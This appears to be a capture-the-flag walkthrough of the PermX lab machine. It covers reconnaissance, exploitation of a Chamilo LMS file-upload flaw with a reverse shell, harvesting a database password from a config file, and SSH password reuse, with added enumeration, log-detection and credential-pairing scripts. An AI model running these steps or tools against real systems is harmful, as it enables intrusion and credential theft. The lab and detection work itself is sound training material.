Reconnaissance

T1595.002 - Active Scanning: Vulnerability Scanning

Initial Reconnaissance with nmap

  • Objective: Discover the services, and their versions, listening on the target.

  • Purpose: Knowing exactly which software versions are exposed narrows the search for applicable vulnerabilities and shows which ports deserve deeper enumeration.

  • Explanation: The nmap scan lists the open TCP ports on the host, fingerprints the service behind each one, and runs the default script set against it.

    Command:

    nmap -sC -sV -Pn 10.10.11.23
    
  • The flags:

    • -sC: Run the default script set. These scripts enumerate the detected services (SSH host keys, HTTP title and Server header, and similar); they are not a vulnerability scan.
    • -sV: Probe each open port to identify the service and its version.
    • -Pn: Skip host discovery and scan the target as if it were online, so a host that drops ICMP echo requests is still scanned.
  • Output:

    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
    |_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
    80/tcp open  http    Apache httpd 2.4.52
    |_http-title: eLEARNING
    |_http-server-header: Apache/2.4.52 (Ubuntu)
    
  • Interpretation:

    • Port 22 runs OpenSSH 8.9p1 (the Ubuntu 22.04 build). It is the likely way in once a password or key is recovered, not a target in itself.
    • Port 80 runs Apache httpd 2.4.52 and serves a page titled "eLEARNING", so the attack surface is a web application rather than the web server. Neither version string is a foothold on its own; the application behind port 80 is what needs to be identified and enumerated next.

T1595.003 - Active Scanning: Wordlist Scanning

Subdomain Enumeration with ffuf

  • Objective: Enumerate virtual hosts under permx.htb to find web applications beyond the default site.

  • Purpose: Each additional virtual host is another application with its own code and configuration, and often weaker protection than the main site.

  • Explanation: The target's names are not in public DNS, so instead of querying DNS, ffuf sends every request to the same address and varies the Host header; Apache selects the virtual host from that header. This requires permx.htb to be mapped to 10.10.11.23 in /etc/hosts beforehand, and each hit must be added there too before it can be browsed.

    Command:

    ffuf -u http://permx.htb -H "Host: FUZZ.permx.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -mc 200
    
  • Explanation: ffuf substitutes each wordlist entry for the FUZZ keyword in the Host header.

    • -u http://permx.htb: The URL every request is sent to; the hostname resolves through /etc/hosts.
    • -H "Host: FUZZ.permx.htb": The Host header carrying the candidate name.
    • -w: Wordlist of candidate subdomain labels.
    • -mc 200: Show only responses with HTTP status 200. This only separates real hosts from noise if names that do not exist fall through to a default response with a different status; when the default virtual host answers 200 as well, every name matches and you have to filter on response size instead (-fs with the default response's size, or -ac to auto-calibrate).
  • Output:

    www                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 22ms]
    lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 49ms]
    
  • Interpretation:

    • Two names answer 200 with different page sizes: www.permx.htb (36182 bytes, the same size as the main site) and lms.permx.htb (19347 bytes, a different application). After adding lms.permx.htb to /etc/hosts, browsing it identifies the application as Chamilo LMS, which is the target of the next section.
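Virtual-host discovery with a baseline filter, as an added example (not code from the write-up or from ffuf). It does what the ffuf command above does, sends every request to one address and varies the Host header, and adds the check that -mc 200 alone does not give you: each response is compared with the default virtual host's response, so a catch-all host that answers 200 to every name does not flood the output. The target address, domain and wordlist are assumptions supplied on the command line.

```python
"""Virtual-host discovery with a baseline filter.

Added example, not from the original write-up or from ffuf. It reproduces what
the ffuf command does (one target address, varying Host header) and filters
each response against the default virtual host's response, which is the same
idea as ffuf's -fs / -ac. Target address, domain and wordlist are assumptions
taken from the command line.
"""
import http.client
import sys
from collections import namedtuple

Response = namedtuple("Response", "name status size")

# A label that will not exist; its response defines the default virtual host.
BASELINE_NAME = "definitely-not-a-vhost-5f2a9c"


def probe(target_ip, domain, name, timeout=5):
    """GET / from target_ip with Host: <name>.<domain>; return a Response."""
    conn = http.client.HTTPConnection(target_ip, 80, timeout=timeout)
    try:
        conn.request("GET", "/", headers={"Host": f"{name}.{domain}"})
        resp = conn.getresponse()
        return Response(name, resp.status, len(resp.read()))
    finally:
        conn.close()


def select_vhosts(responses, base, tolerance=0):
    """Return the responses that differ from the default virtual host.

    A name is kept when its status differs from the baseline, or when the
    status is the same but the body size differs by more than `tolerance`
    bytes. Catch-all pages sometimes echo the requested hostname, which
    shifts the size by a few bytes; `tolerance` absorbs that.
    """
    hits = []
    for r in responses:
        if r.status != base.status or abs(r.size - base.size) > tolerance:
            hits.append(r)
    return hits


def enumerate_vhosts(target_ip, domain, names, tolerance=0):
    """Probe the baseline, then every candidate; return (baseline, hits)."""
    base = probe(target_ip, domain, BASELINE_NAME)
    responses = [probe(target_ip, domain, n) for n in names]
    return base, select_vhosts(responses, base, tolerance)


if __name__ == "__main__":
    # usage: vhosts.py <target-ip> <domain> <wordlist>
    target_ip, domain, wordlist = sys.argv[1:4]
    with open(wordlist) as fh:
        names = [w.strip() for w in fh if w.strip() and not w.startswith("#")]
    base, hits = enumerate_vhosts(target_ip, domain, names)
    print(f"baseline: status={base.status} size={base.size}")
    for h in hits:
        print(f"{h.name:<24}[Status: {h.status}, Size: {h.size}]")
```

One consequence of filtering on the baseline: when the default virtual host is the main site itself, a www entry that serves identical content is suppressed as a duplicate, which is correct, since that site is already known; only hosts that serve something different, such as lms above, are reported.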

Initial Access

T1190 - Exploit Public-Facing Application

Exploit: CVE-2023-4220

  • Objective: Gain a foothold on the target by exploiting a vulnerability in the Chamilo LMS instance on lms.permx.htb.

  • Purpose: CVE-2023-4220 is an unrestricted file upload in the big-file upload component of Chamilo LMS 1.11.24 and earlier. An unauthenticated user can place a PHP file in a web-reachable directory and then request it, which gives remote code execution as the web server account.

  • Explanation: A public exploit script uploads a PHP reverse shell through the vulnerable upload handler and then requests it, so the shell runs on the server and connects back to a listener on the attacking machine.

    Steps:

    1. Prepare Reverse Shell: Use the PentestMonkey php-reverse-shell script, after editing its $ip and $port variables to the attacker's VPN address and the listener port chosen below (9001). An unedited copy tries to connect to 127.0.0.1 and fails silently.

    2. Start Listener: Begin listening on port 9001.

      nc -lvnp 9001
      
      • nc: Netcat, used here as a plain TCP listener for the shell to connect back to.
      • -l: Listen for an incoming connection instead of connecting out.
      • -v: Verbose, so the incoming connection is announced.
      • -n: Numeric only; no DNS lookups.
      • -p 9001: Local port to listen on; it must match the port set in the shell script.
    3. Run Exploit:

      ./CVE-2023-4220.sh -f ./shell.php -h http://lms.permx.htb/ -p 9001
      
      • -f ./shell.php: Path to the PHP shell the script uploads.
      • -h http://lms.permx.htb/: Base URL of the vulnerable Chamilo instance.
      • -p 9001: Port for the reverse shell connection; it must match the listener.
  • Output:

    • The listener receives a connection and the reverse shell runs as www-data, the Apache service account.
  • Interpretation: The upload and the callback both succeeded, so this Chamilo install is vulnerable to CVE-2023-4220 and the vulnerability is exploitable as an unauthenticated user. The shell is a bare TCP connection; upgrading it to a pty (for example with python3 -c 'import pty; pty.spawn("/bin/bash")') makes the enumeration that follows easier.
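The detection side of the same exploit, as an added example (not part of the write-up or of the exploit script). It scans Apache access logs for the pattern the exploit leaves behind: a POST to the vulnerable upload handler followed by a request, from the same source, for a PHP file somewhere else under the bigupload directory. Assumptions: the vulnerable endpoint is /main/inc/lib/javascript/bigupload/inc/bigUpload.php (the path named in the CVE description), Apache writes the combined log format, and the log lines embedded in the block are constructed for the example.

```python
"""Hunt for CVE-2023-4220 exploitation in Apache access logs.

Added example for the detection side of the exploit; it is not part of the
write-up or of the exploit script. Assumptions: the vulnerable endpoint is
the bigUpload.php path named in the CVE description, the log is in Apache's
combined format, and a successful exploit appears as a POST to that endpoint
followed by a request from the same source for a .php file elsewhere under
the bigupload directory. The sample log lines are constructed.
"""
import re
import sys
from collections import defaultdict

COMBINED = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD_ENDPOINT = "/main/inc/lib/javascript/bigupload/inc/bigUpload.php"
UPLOAD_DIR = "/main/inc/lib/javascript/bigupload/"

# Constructed sample: one ordinary user (10.10.14.20) who legitimately uses the
# big-file upload, and one attacker (10.10.14.7) who plants and runs a shell.
SAMPLE_LOG = """\
10.10.14.20 - - [04/Jul/2024:14:01:57 +0000] "GET /main/auth/inscription.php HTTP/1.1" 200 19347 "-" "Mozilla/5.0"
10.10.14.7 - - [04/Jul/2024:14:02:11 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php HTTP/1.1" 200 61 "-" "curl/8.5.0"
10.10.14.20 - - [04/Jul/2024:14:02:30 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php HTTP/1.1" 200 61 "http://lms.permx.htb/" "Mozilla/5.0"
10.10.14.7 - - [04/Jul/2024:14:02:12 +0000] "GET /main/inc/lib/javascript/bigupload/files/shell.php HTTP/1.1" 200 0 "-" "curl/8.5.0"
10.10.14.20 - - [04/Jul/2024:14:03:02 +0000] "GET /main/inc/lib/javascript/bigupload/files/lecture.mp4 HTTP/1.1" 200 48210 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    rec["status"] = int(rec["status"])
    return rec


def is_upload_post(rec):
    """A POST to the vulnerable upload handler (legitimate use looks the same)."""
    return rec["method"] == "POST" and rec["path"] == UPLOAD_ENDPOINT


def is_planted_php(rec):
    """A .php request under the bigupload tree that is not the handler itself."""
    p = rec["path"]
    return p.startswith(UPLOAD_DIR) and p.lower().endswith(".php") and p != UPLOAD_ENDPOINT


def find_exploit_chains(lines):
    """Return (src, upload_ts, shell_path) for every source that POSTed to the
    upload handler and afterwards requested a planted .php file."""
    uploads = defaultdict(list)  # src -> timestamps of successful upload POSTs
    chains = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if is_upload_post(rec) and rec["status"] == 200:
            uploads[rec["src"]].append(rec["ts"])
        elif is_planted_php(rec) and uploads.get(rec["src"]):
            chains.append((rec["src"], uploads[rec["src"]][-1], rec["path"]))
    return chains


def suspicious_uploads(lines):
    """Lower-confidence signal: every source that POSTed to the upload handler."""
    return sorted({rec["src"] for rec in map(parse_line, lines)
                   if rec and is_upload_post(rec)})


if __name__ == "__main__":
    # usage: hunt.py [access.log]; without an argument the constructed sample is used
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_LOG.splitlines()
    for src, ts, path in find_exploit_chains(lines):
        print(f"ALERT {src} uploaded at {ts} then fetched {path}")
    print("upload sources:", ", ".join(suspicious_uploads(lines)))
```

The two signals are deliberately separate: a POST to the handler on its own is what an administrator uploading a large course file also produces, so it is only worth a low-severity count per source, while the POST followed by a fetch of a PHP file under that directory is the exploit chain and warrants an alert.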


Credential Access

T1552.001 - Credentials in Files

Accessing Configuration Files for Credentials

  • Objective: Extract the database credentials stored in Chamilo's configuration file.

  • Purpose: Applications keep database passwords in cleartext because they need them at runtime; when an administrator reuses that password for a shell account, the configuration file becomes the path from the web server user to a real login.

  • Explanation: Chamilo LMS keeps its settings in app/config/configuration.php as assignments to the $_configuration array, including the database user and password. The file has to be readable by www-data for the application to work, so the web shell can read it directly.

    Command:

    grep -E '^[^/]*\$_configuration\[' /var/www/chamilo/app/config/configuration.php
    
    • grep -E '^[^/]*\$_configuration\[': Prints lines that assign to $_configuration[...]. The leading [^/]* tolerates indentation but rejects lines that begin with a // comment, so commented-out old values are skipped; the backslashes keep $ and [ literal.
    • The output is the full set of configuration keys. The ones of interest are db_user, db_password and anything else that looks like a secret (Chamilo's security_key, for instance).
  • Output:

    $_configuration['db_user'] = 'chamilo';
    $_configuration['db_password'] = '03F6lY3uXAP2bkW8';
    
  • Interpretation: The database username and password are recovered. The username (chamilo) is not a system account, so the reuse check is the password alone against the local users that have a login shell (/etc/passwd or a listing of /home shows mtz). That password turns out to authenticate mtz over SSH.


Lateral Movement

T1021.001 - Remote Services: SSH

SSH Access with Recovered Credentials

  • Objective: Log in over SSH as mtz with the recovered password.

  • Purpose: The web shell is a single unprivileged connection that dies if the listener drops; SSH gives a stable, fully interactive session as a real user, which is the base for further enumeration and data extraction.

  • Explanation: The Chamilo database password is tried against the mtz account over SSH, using the target address from the nmap scan.

    Command:

    An interactive SSH login to 10.10.11.23 as mtz, entering the db_password value from configuration.php at the password prompt.

  • Output:

    mtz@permx:~$ ls
    user.txt
    
  • Interpretation: The login succeeds, confirming that the mtz account's password is the same one stored in Chamilo's configuration file. This yields user.txt and a foothold as mtz. The same reuse check should be repeated for root and any other interactive accounts before moving on to privilege escalation.
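The credential-harvesting and reuse check from the Credential Access and SSH sections, as one added example (not code from the write-up). The first half is the grep from the Credential Access section written as a parser, skipping // comments the same way; the second half reads /etc/passwd for the accounts that can actually log in; the two are paired into the (user, password) combinations to try over SSH. The configuration and passwd contents embedded in the block are constructed samples, not the target's real values, and the security_key entry is an assumption about what else in the file counts as a secret.

```python
"""Harvest secrets from Chamilo's configuration.php and pair them with the
local accounts a recovered password should be tried against over SSH.

Added example, not code from the write-up. The configuration and /etc/passwd
samples are constructed; the target's real values are not reproduced here.
"""
import re
import sys

# $_configuration['key'] = 'value';   (single- or double-quoted, matching pairs)
ASSIGN = re.compile(
    r"""^\s*\$_configuration\[\s*(['"])(?P<key>[^'"]+)\1\s*\]\s*=\s*(['"])(?P<val>[^'"]*)\3\s*;"""
)
SECRET_KEY = re.compile(r"pass|secret|key|token|salt", re.IGNORECASE)
NON_LOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync")

# Constructed sample in the shape of Chamilo's app/config/configuration.php.
SAMPLE_CONFIG = """<?php
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_user'] = 'chamilo';
//$_configuration['db_password'] = 'retired-value';
$_configuration['db_password'] = 'S4mpl3-DB-Passw0rd';
$_configuration["security_key"] = "constructed-security-key";
$_configuration['root_web'] = 'http://lms.example.test/';
"""

# Constructed sample of /etc/passwd with one service account and one real user.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mtz:x:1000:1000:mtz:/home/mtz:/bin/bash
"""


def parse_configuration(text):
    """Map $_configuration keys to values, ignoring commented-out lines."""
    config = {}
    for line in text.splitlines():
        if line.lstrip().startswith(("//", "#", "/*", "*")):
            continue
        m = ASSIGN.match(line)
        if m:
            config[m.group("key")] = m.group("val")
    return config


def secrets(config):
    """Keep only the non-empty entries whose name suggests a credential."""
    return {k: v for k, v in config.items() if SECRET_KEY.search(k) and v}


def login_users(passwd_text):
    """Accounts with a real shell: root plus ordinary users (uid >= 1000)."""
    users = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) < 7:
            continue
        name, uid, shell = parts[0], int(parts[2]), parts[6]
        if shell in NON_LOGIN_SHELLS:
            continue
        if uid == 0 or uid >= 1000:
            users.append(name)
    return users


def reuse_candidates(config_text, passwd_text):
    """(user, password) pairs to try over SSH.

    Order: the database user first if it happens to be a local account (it
    usually is not, and only the password carries over), then ordinary users,
    then root. Each secret value is tried once per user, in file order.
    """
    config = parse_configuration(config_text)
    passwords = list(dict.fromkeys(secrets(config).values()))  # unique, ordered
    users = login_users(passwd_text)
    db_user = config.get("db_user")
    ordered = [u for u in users if u == db_user]
    ordered += [u for u in users if u != "root" and u != db_user]
    ordered += [u for u in users if u == "root" and u != db_user]
    return [(u, p) for u in ordered for p in passwords]


if __name__ == "__main__":
    # usage: reuse.py [configuration.php /etc/passwd]; defaults to the samples
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as c, open(sys.argv[2]) as p:
            cfg, pwd = c.read(), p.read()
    else:
        cfg, pwd = SAMPLE_CONFIG, SAMPLE_PASSWD
    for user, password in reuse_candidates(cfg, pwd):
        print(f"try: ssh {user}@target   (password: {password})")
```

Run it on the target from the www-data shell with the real paths, then try each printed pair by hand. The list is deliberately small (a handful of secrets against a handful of accounts): a single attempt per pair is enough to confirm reuse and does not risk tripping a lockout policy.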


Conclusion

In this exercise, the PermX machine was compromised through service enumeration, a known vulnerability, and insecure credential handling. The methodology, step by step:

  • Service and Subdomain Discovery: nmap found SSH and Apache; virtual-host fuzzing found lms.permx.htb, a Chamilo LMS instance.
  • Exploitation of Public Vulnerabilities: CVE-2023-4220, an unrestricted file upload in Chamilo, gave a www-data shell.
  • Credential Harvesting and Reuse: The database password in configuration.php was also the mtz account's password, which turned the web shell into an SSH login.

The mitigations follow the same chain: patch Chamilo to a release that fixes CVE-2023-4220 and do not expose the LMS more widely than it needs to be; give every service its own password, so a database credential that legitimately sits in a configuration file cannot double as a shell login; and watch for executable files appearing in directories the web server serves.